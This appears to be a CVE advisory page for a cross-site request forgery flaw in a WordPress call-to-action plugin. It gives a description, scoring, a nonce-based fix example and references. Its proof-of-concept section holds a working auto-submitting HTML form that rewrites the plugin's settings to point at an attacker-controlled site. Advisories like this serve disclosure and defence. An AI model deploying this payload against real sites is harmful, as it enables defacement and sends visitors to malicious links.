Security Vulnerability Report
CVE-2026-4118 CVSS 4.3 MEDIUM

Published: 2026-04-22 09:16:23
Last Modified: 2026-04-22 20:22:51

Description

The Call To Action Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.3. This is due to missing nonce validation in the cbox_options_page() function, which handles saving, creating, and deleting plugin settings. The form rendered on the settings page does not include a wp_nonce_field(), and the save handler does not call wp_verify_nonce() or check_admin_referer() before processing settings updates via $wpdb->update(). This makes it possible for unauthenticated attackers to modify plugin settings such as the call-to-action box title, content, link URL, image URL, colors, and other configuration options via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
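The fix the description implies is to tie the settings form and its save handler together with a WordPress nonce and a capability check. The following is an added illustration, not the plugin's own code: a hardened shape for cbox_options_page() in which the table name, field names, and the 'manage_options' capability are assumptions.

```php
<?php
// Added example (not the plugin's code): nonce- and capability-protected
// version of the settings handler described in the CVE. Table name, field
// names and capability are assumptions for illustration.
function cbox_options_page() {
    global $wpdb;
    $table = $wpdb->prefix . 'cbox_settings'; // assumed table name

    if ( isset( $_POST['action'] ) && 'save' === $_POST['action'] ) {
        // Reject users who lack the capability to change plugin settings.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
        }
        // Reject requests without a valid nonce. A cross-site forged form
        // cannot know the nonce, so check_admin_referer() terminates the
        // request here and the $wpdb->update() below never runs.
        check_admin_referer( 'cbox_save_settings', 'cbox_nonce' );

        $color = wp_unslash( $_POST['cbox_color'] ?? '' );
        $wpdb->update(
            $table,
            array(
                'title'   => sanitize_text_field( wp_unslash( $_POST['cbox_title'] ?? '' ) ),
                'content' => wp_kses_post( wp_unslash( $_POST['cbox_content'] ?? '' ) ),
                'link'    => esc_url_raw( wp_unslash( $_POST['cbox_link'] ?? '' ) ),
                'image'   => esc_url_raw( wp_unslash( $_POST['cbox_image'] ?? '' ) ),
                // Accept only a #RRGGBB value; anything else is stored as empty.
                'color'   => preg_match( '/^#[0-9A-Fa-f]{6}$/', $color ) ? $color : '',
            ),
            array( 'id' => 1 )
        );
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }
    ?>
    <form method="post" action="">
        <?php
        // Emits the hidden nonce field (named cbox_nonce) and the referer
        // field that check_admin_referer() validates on submission.
        wp_nonce_field( 'cbox_save_settings', 'cbox_nonce' );
        ?>
        <input type="hidden" name="action" value="save" />
        <input type="text" name="cbox_title" />
        <textarea name="cbox_content"></textarea>
        <input type="url" name="cbox_link" />
        <input type="url" name="cbox_image" />
        <input type="text" name="cbox_color" />
        <?php submit_button( 'Save settings' ); ?>
    </form>
    <?php
}
```

With this in place, the forged POST in the PoC below fails at check_admin_referer() with a "The link you followed has expired" error before any settings are written.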

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Call To Action Plugin <= 3.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- Proof of Concept for CVE-2026-4118 -->
<!-- This HTML page demonstrates the CSRF vulnerability by auto-submitting a form. -->
<!-- The target administrator must be logged in for the request to succeed. -->
<html>
<body>
<h2>CSRF Exploit Demo</h2>
<p>This page attempts to update plugin settings via a forged request.</p>
<!-- Assuming the action URL points to the plugin's options page handler -->
<form action="http://target-site/wp-admin/admin.php?page=cbox_options_page" method="POST">
  <!-- Malicious payload to change settings -->
  <input type="hidden" name="cbox_title" value="Hacked by CSRF" />
  <input type="hidden" name="cbox_content" value="Click here for malicious link" />
  <input type="hidden" name="cbox_link" value="http://attacker-controlled-site.com" />
  <input type="hidden" name="cbox_image" value="http://attacker-controlled-site.com/image.jpg" />
  <input type="hidden" name="cbox_color" value="#FF0000" />
  <input type="hidden" name="action" value="save" />
  <input type="submit" value="Submit Request" />
</form>
<script>
  // Automatically trigger the exploit when the page loads
  document.forms[0].submit();
</script>
</body>
</html>

Weakness

CWE-352 (Cross-Site Request Forgery)

References

https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L41
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L55
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L69
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L76
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L41
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L55
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L69
https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L76
https://www.wordfence.com/threat-intel/vulnerabilities/id/6d15f5de-9ec9-466d-aafe-6304356ccb39?source=cve